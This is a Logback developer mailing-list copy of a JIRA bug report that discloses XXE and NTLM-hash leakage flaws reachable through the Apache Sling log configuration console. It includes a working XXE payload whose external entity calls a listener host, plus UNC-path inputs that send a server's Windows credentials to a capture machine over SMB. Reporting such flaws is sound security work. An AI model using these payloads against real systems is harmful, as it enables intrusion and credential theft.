[logback-dev] [JIRA] (LOGBACK-1465) xxe and Information disclosure vulnerabilities in Logback

QOS.CH (JIRA) noreply-jira at qos.ch
Thu May 9 09:48:00 CEST 2019


shuiboye created LOGBACK-1465:
---------------------------------

             Summary: xxe and Information disclosure vulnerabilities in Logback
                 Key: LOGBACK-1465
                 URL: https://jira.qos.ch/browse/LOGBACK-1465
             Project: logback
          Issue Type: Bug
          Components: logback-core
         Environment: I test Apache Sling latest version 11 integrating Logback running on windows system 
            Reporter: shuiboye
            Assignee: Logback dev list
            Priority: Critical
         Attachments: image-2019-05-09-15-41-28-419.png, image-2019-05-09-15-41-45-829.png, image-2019-05-09-15-43-09-668.png, image-2019-05-09-15-43-25-103.png

Hi,I find xxe and Information disclosure vulnerabilities in Logback when testing Apache Sling latest version 11 integrating Logback.

First I login in Sling as an admin.
*xxe*
The vulnerable url is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the " Logback Config File "  field,I input "\\192.168.0.102\c$\xxe.xml" as shown below.
!image-2019-05-09-15-43-09-668.png!
The content of the xxe.xml under c:\  directory on the server 192.168.0.102 is 
{quote}{quote}<?xml version="1.0"?>{quote}
{quote}<!DOCTYPE r [{quote}
{quote}<!ENTITY % sp SYSTEM "[http://192.168.0.102:8090/sling]">{quote}
{quote}%sp;{quote}
{quote}]>{quote}{quote}
 
 After click "save"  ,the netcat running on the server  192.168.0.102 and listening to the port 8090 receives the request as shown below.
!image-2019-05-09-15-43-25-103.png!
 
*information disclosure(Windows username and NTLM password hash)*
The vulnerable url is [http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
To ensure that the " Logback Config File " can result in the server's Windows username and NTLM password hash being leaked to remote attackers through SMB,I use another machine to visit the vulnerable page whose url is also [http://192.168.0.102:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the " Logback Config File "  field,I input "\\192.168.9.128\test".The ip 192.168.9.128 is anthoer machine used to capture smb.
!image-2019-05-09-15-41-28-419.png!
After click "save"  ,the machine whose ip is 192.168.9.128 successfully captures the Windows username and NTLM password hash through SMB.
 
!image-2019-05-09-15-41-45-829.png!



--
This message was sent by Atlassian JIRA
(v7.3.1#73012)


More information about the logback-dev mailing list